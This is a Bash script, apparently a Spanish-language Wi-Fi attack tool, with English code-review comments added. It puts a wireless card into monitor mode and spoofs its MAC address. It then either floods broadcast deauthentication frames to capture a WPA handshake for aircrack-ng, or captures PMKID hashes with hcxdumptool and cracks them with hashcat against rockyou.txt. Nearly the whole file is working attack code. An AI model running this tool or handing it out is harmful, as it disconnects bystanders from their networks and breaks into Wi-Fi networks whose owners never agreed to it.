#!/bin/bash
# Author: s4vitar - nmap y pa' dentro
# ANSI colour escape sequences. They are stored with literal backslashes and
# only become terminal escapes when printed through `echo -e`.
endColour='\033[0m\e[0m'
grayColour='\e[0;37m\033[1m'
redColour='\e[0;31m\033[1m'
greenColour='\e[0;32m\033[1m'
yellowColour='\e[0;33m\033[1m'
blueColour='\e[0;34m\033[1m'
purpleColour='\e[0;35m\033[1m'
turquoiseColour='\e[0;36m\033[1m'

# Keep apt-get (used by the dependency check) from prompting.
DEBIAN_FRONTEND=noninteractive
export DEBIAN_FRONTEND

# Route Ctrl+C to the cleanup handler defined below.
trap 'ctrl_c' INT
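#######################################
# SIGINT handler: restore the terminal cursor, take the monitor interface
# down again, delete capture files and exit.
# Globals:   networkCard (read), colour variables (read)
# Outputs:   a "Saliendo" notice on stdout
# Returns:   never returns; exits with status 0
#######################################
function ctrl_c(){
  echo -e "\n${yellowColour}[*]${endColour}${grayColour}Saliendo${endColour}"
  tput cnorm

  # networkCard is only assigned once -n has been parsed. Without this guard
  # an early Ctrl+C would run `airmon-ng stop mon` against an interface the
  # script never created.
  if [[ -n "${networkCard:-}" ]]; then
    airmon-ng stop "${networkCard}mon" > /dev/null 2>&1
  fi

  # Only the Captura* files in the current directory are removed; "--" keeps
  # a file name from being read as an rm option.
  rm -f -- Captura* 2>/dev/null
  exit 0
}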
#######################################
# Print the usage panel (options a, n and h) and terminate the script.
# Globals:   colour variables (read)
# Outputs:   usage text on stdout
# Returns:   never returns; exits with status 0
#######################################
function helpPanel(){
  # One array element per output line; %b expands the backslash escapes the
  # same way `echo -e` does.
  local -a panel_lines=(
    "\n${yellowColour}[*]${endColour}${grayColour} Uso: ./s4viPwnWifi.sh${endColour}"
    "\n\t${purpleColour}a)${endColour}${yellowColour} Modo de ataque${endColour}"
    "\t\t${redColour}Handshake${endColour}"
    "\t\t${redColour}PKMID${endColour}"
    "\t${purpleColour}n)${endColour}${yellowColour} Nombre de la tarjeta de red${endColour}"
    "\t${purpleColour}h)${endColour}${yellowColour} Mostrar este panel de ayuda${endColour}\n"
  )
  printf '%b\n' "${panel_lines[@]}"
  exit 0
}
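#######################################
# Check that the required tools exist under /usr/bin and install any missing
# one with apt-get.
# Globals:   colour variables (read)
# Outputs:   progress on stdout; an error line on stderr when an install fails
# Returns:   0 when every tool is present or was installed, 1 otherwise
#
# NOTE(review): the install runs unattended with all output discarded, and the
# visible caller only reaches this function as root. A failed install used to
# be ignored silently; it is now reported and reflected in the return status.
#######################################
function dependencies(){
  local program
  local -i failed=0
  local -a required=(aircrack-ng macchanger)

  tput civis
  clear
  echo -e "${yellowColour}[*]${endColour}${grayColour} Comprobando programas necesarios...${endColour}"
  sleep 2

  for program in "${required[@]}"; do
    echo -ne "\n${yellowColour}[*]${endColour}${blueColour} Herramienta${endColour}${purpleColour} $program${endColour}${blueColour}...${endColour}"
    if [[ -f "/usr/bin/$program" ]]; then
      echo -e " ${greenColour}(V)${endColour}"
    else
      echo -e " ${redColour}(X)${endColour}\n"
      echo -e "${yellowColour}[*]${endColour}${grayColour} Instalando herramienta ${endColour}${blueColour}$program${endColour}${yellowColour}...${endColour}"
      if ! apt-get install "$program" -y > /dev/null 2>&1; then
        echo -e "${redColour}[!]${endColour}${grayColour} No se ha podido instalar ${endColour}${blueColour}$program${endColour}" >&2
        failed=1
      fi
    fi
    sleep 1
  done

  return "$failed"
}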
# Put the interface into monitor mode and run the sequence selected by
# $attack_mode ("Handshake" or "PKMID"; any other value only prints an error,
# after the interface has already been reconfigured).
# Globals read:    networkCard, attack_mode, colour variables
# Globals written: apName, apChannel, airodump_xterm_PID,
#                  airodump_filter_xterm_PID, aireplay_xterm_PID
# Files written:   Captura* and, in PKMID mode, myHashes, all in the current
#                  directory
# NOTE(review): networkCard, apName and apChannel are spliced unquoted into
# command strings handed to `xterm -e "..."` and `bash -c "..."`, and nothing
# in this function validates them. The visible caller only gets here as root,
# so shell metacharacters in any of them would be interpreted with root
# privileges. apName is presumably copied from the airodump-ng window, i.e. it
# is text chosen by whoever operates the access point - confirm and validate,
# or pass the values as separate arguments instead of one string.
# NOTE(review): no exit status of the external tools is checked here.
function startAttack(){
clear
echo -e "${yellowColour}[*]${endColour}${grayColour} Configurando tarjeta de red...${endColour}\n"
# The rest of the function assumes airmon-ng named the monitor interface
# "${networkCard}mon".
airmon-ng start $networkCard > /dev/null 2>&1
# Interface down, ask macchanger for a different MAC address, interface up.
ifconfig ${networkCard}mon down && macchanger -a ${networkCard}mon > /dev/null 2>&1
# killall stops every dhclient and wpa_supplicant process on the host; nothing
# visible in this file restarts them afterwards.
ifconfig ${networkCard}mon up; killall dhclient wpa_supplicant 2>/dev/null
echo -e "${yellowColour}[*]${endColour}${grayColour} Nueva dirección MAC asignada ${endColour}${purpleColour}[${endColour}${blueColour}$(macchanger -s ${networkCard}mon | grep -i current | xargs | cut -d ' ' -f '3-100')${endColour}${purpleColour}]${endColour}"
if [ "$(echo $attack_mode)" == "Handshake" ]; then
# Open airodump-ng in its own xterm so the operator can read off the access
# point name and channel, then close that window once both were entered.
xterm -hold -e "airodump-ng ${networkCard}mon" &
airodump_xterm_PID=$!
# `read` without -r: backslashes in the typed value are interpreted.
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Nombre del punto de acceso: ${endColour}" && read apName
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Canal del punto de acceso: ${endColour}" && read apChannel
kill -9 $airodump_xterm_PID
wait $airodump_xterm_PID 2>/dev/null
# Filtered capture, written with the file prefix "Captura".
xterm -hold -e "airodump-ng -c $apChannel -w Captura --essid $apName ${networkCard}mon" &
airodump_filter_xterm_PID=$!
# aireplay-ng -0 sends deauthentication frames, here with the broadcast
# address as client. Bursts of such frames are a standard wireless-IDS signal,
# and 802.11w Protected Management Frames make clients discard forged ones.
sleep 5; xterm -hold -e "aireplay-ng -0 10 -e $apName -c FF:FF:FF:FF:FF:FF ${networkCard}mon" &
aireplay_xterm_PID=$!
# Fixed timing: both helper windows are killed after set delays, whether or
# not anything was captured.
sleep 10; kill -9 $aireplay_xterm_PID; wait $aireplay_xterm_PID 2>/dev/null
sleep 10; kill -9 $airodump_filter_xterm_PID
wait $airodump_filter_xterm_PID 2>/dev/null
# Dictionary check of Captura-01.cap against rockyou.txt; the xterm is started
# in the background and the function returns without waiting for it.
xterm -hold -e "aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap" &
# "PKMID" is the literal mode string this script accepts (the technique is
# usually written PMKID); it has to match the value passed with -a exactly.
elif [ "$(echo $attack_mode)" == "PKMID" ]; then
clear; echo -e "${yellowColour}[*]${endColour}${grayColour} Iniciando ClientLess PKMID Attack...${endColour}\n"
sleep 2
# Capture for at most 60 seconds into the file "Captura".
timeout 60 bash -c "hcxdumptool -i ${networkCard}mon --enable_status=1 -o Captura"
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Obteniendo Hashes...${endColour}\n"
sleep 2
# Convert the capture into the file myHashes, then delete the raw capture.
# myHashes itself is not removed by any cleanup path visible in this file.
hcxpcaptool -z myHashes Captura; rm Captura 2>/dev/null
# The existence of myHashes decides whether hashcat is run at all.
test -f myHashes
if [ "$(echo $?)" == "0" ]; then
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Iniciando proceso de fuerza bruta...${endColour}\n"
sleep 2
# hashcat in mode 16800, with rockyou.txt and myHashes as its two positional
# arguments. NOTE(review): --force makes hashcat ignore its own warnings.
hashcat -m 16800 /usr/share/wordlists/rockyou.txt myHashes -d 1 --force
else
echo -e "\n${redColour}[!]${endColour}${grayColour} No se ha podido capturar el paquete necesario...${endColour}\n"
rm Captura* 2>/dev/null
sleep 2
fi
else
echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
fi
}
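# Main Function
# Entry point. Requires root, parses -a <mode>, -n <interface> and -h,
# validates both values, then runs dependencies and startAttack and finally
# stops the monitor interface again.
if [ "$(id -u)" == "0" ]; then
  # Start from empty values so nothing is inherited from the environment.
  attack_mode=""
  networkCard=""

  # "h" takes no argument. The earlier optstring ":a:n:h:" turned a bare -h
  # into a missing-argument error that only reached helpPanel by accident.
  while getopts ":a:n:h" arg; do
    case "$arg" in
      a) attack_mode=$OPTARG ;;
      n) networkCard=$OPTARG ;;
      *) helpPanel ;; # -h, unknown option or missing argument
    esac
  done

  # startAttack splices the interface name into strings executed by `bash -c`
  # and `xterm -e` as root, so only accept characters that cannot be shell
  # syntax, and no leading "-" that a tool could read as an option.
  iface_pattern='^[A-Za-z0-9][A-Za-z0-9_.-]*$'

  # Require both values instead of counting flags: "-a x -a y" used to pass
  # the count check with networkCard still empty.
  if [[ -z "$attack_mode" || -z "$networkCard" ]]; then
    helpPanel
  elif [[ ! "$networkCard" =~ $iface_pattern ]]; then
    echo -e "\n${redColour}[*] Nombre de tarjeta de red no válido${endColour}\n"
    exit 1
  elif [[ "$attack_mode" != "Handshake" && "$attack_mode" != "PKMID" ]]; then
    # Reject an unknown mode here, before startAttack reconfigures the
    # interface and kills dhclient/wpa_supplicant.
    echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
    exit 1
  else
    dependencies
    startAttack
    tput cnorm
    airmon-ng stop "${networkCard}mon" > /dev/null 2>&1
  fi
else
  echo -e "\n${redColour}[*] No soy root${endColour}\n"
fi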